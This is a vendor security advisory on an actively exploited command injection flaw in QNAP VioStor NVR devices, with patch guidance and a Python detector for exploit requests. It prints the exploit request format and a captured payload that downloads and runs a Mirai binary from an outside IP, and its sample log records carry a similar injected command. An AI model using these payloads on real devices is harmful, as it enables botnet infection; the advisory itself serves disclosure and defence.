Actively Exploited Vulnerability in QNAP VioStor NVR: Fixed, Patches Available
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series now that one of the affected vendors has released advisory information and guidance.
The vulnerability within QNAP was identified in the wild and has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The malicious payloads captured in the wild install a Mirai-based malware with the intention of creating a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
Need to know
As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. The payloads captured in the wild authenticate with the devices' default credentials.
The following versions of QNAP VioStor NVR firmware are affected:
VioStor NVR: Versions 5.0.0 and earlier (5.0.0 released June 21, 2014)
QNAP considers these devices discontinued for support; however, the vendor recommends upgrading VioStor firmware on existing devices to the latest available version. This issue had previously been patched, although it was never publicly reported/disclosed. Furthermore, users should change the default passwords on their devices.
Additionally, US-CERT has issued an advisory.
Exploitation observed
Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported only on two zero-day vulnerabilities as the team was unable to positively link the observed exploit to a given device or manufacturer. This made it difficult to confirm the zero-day classification of the exploit.
After deeper examination of various aspects of the exploit and payload, the SIRT believed the target to be QNAP VioStor NVR devices. These devices fit the targeting profile of the campaign and were shipped with weak default credentials (found in their manuals and observed in the exploit). As with the initial two zero-days, the exploit abuses an OS command injection vulnerability in the NTP settings of the affected Internet of Things (IoT) and NVR devices.
After relaying these theories to the US-CERT, they coordinated with Akamai SIRT and QNAP to review the evidence and help confirm the SIRT’s theories. Ultimately, QNAP confirmed the payloads targeted their VioStor devices — which are retired and no longer supported — but only targeted older versions (5.0.0 or earlier) of their previously released firmware.
The vulnerability is exploited by making a POST to the /cgi-bin/server/server.cgi path. The remote code execution (RCE) exists where the argument for SPECIFIC_SERVER is specified (Figure 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Fig. 1: Attempted exploitation of the RCE via command injection
An example of a captured infection payload is shown in Figure 2.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Fig. 2: Captured RCE payload
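As an added defender-side example (not Akamai's Snort/YARA rules and not QNAP code), the following Python flags POST requests to the server.cgi path from Figure 1 whose SPECIFIC_SERVER value is anything other than a plain hostname or IP address. The sample records are constructed; 192.0.2.10 is a documentation placeholder, not an indicator from the advisory.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Vulnerable endpoint named in the advisory; SPECIFIC_SERVER is its NTP server field.
VULN_PATH = "/cgi-bin/server/server.cgi"
# A legitimate NTP server value is a bare hostname or IP address.
NTP_VALUE_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")
# Characters that have no place in a hostname but drive shell command chaining.
SHELL_META_RE = re.compile(r"[;|&`$()<>\n]")

def parse_body(body):
    """Decode a form body into {key: [values]}; split on '&' only so ';' in a value survives."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def check_request(method, url, body):
    """Return reasons a request resembles CVE-2023-47565 exploitation; [] means benign."""
    if method.upper() != "POST" or urlsplit(url).path != VULN_PATH:
        return []
    reasons = []
    # Blank values are skipped: the field is empty when NTP sync is disabled.
    for value in filter(None, parse_body(body).get("SPECIFIC_SERVER", [])):
        if SHELL_META_RE.search(value):
            reasons.append("shell metacharacters in SPECIFIC_SERVER")
        elif not NTP_VALUE_RE.match(value):
            reasons.append("SPECIFIC_SERVER is not a hostname or IP address")
    return reasons

def scan_records(records):
    """records: iterable of (method, url, body). Returns [(index, reasons)] for hits."""
    hits = []
    for i, (method, url, body) in enumerate(records):
        reasons = check_request(method, url, body)
        if reasons:
            hits.append((i, reasons))
    return hits

# Constructed sample traffic; 192.0.2.10 is a documentation placeholder, not a real IoC.
SAMPLE_RECORDS = [
    ("POST", VULN_PATH + "?func=server02_main_submit&counter=1&APPLY=",
     "time_mode=2&CONFIGURE_NTP=on&SPECIFIC_SERVER=pool.ntp.org"),
    ("POST", VULN_PATH + "?func=server02_main_submit&counter=1&APPLY=",
     "time_mode=2&CONFIGURE_NTP=on&SPECIFIC_SERVER=wget+http://192.0.2.10/x;chmod+777+*;./x"),
    ("GET", VULN_PATH + "?func=server02_main", ""),
    ("POST", "/cgi-bin/login.cgi", "user=admin"),
]
```

Running scan_records over SAMPLE_RECORDS reports only the second record; the same check can be applied to reverse-proxy access logs that retain request bodies.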
Basic security practices matter
The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.
Conclusion
Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.
This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.
Stay tuned
The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.
The Akamai SIRT would like to thank CISA, US-CERT, and QNAP for their assistance with our communications, coordination, identification, remediation, and disclosure efforts.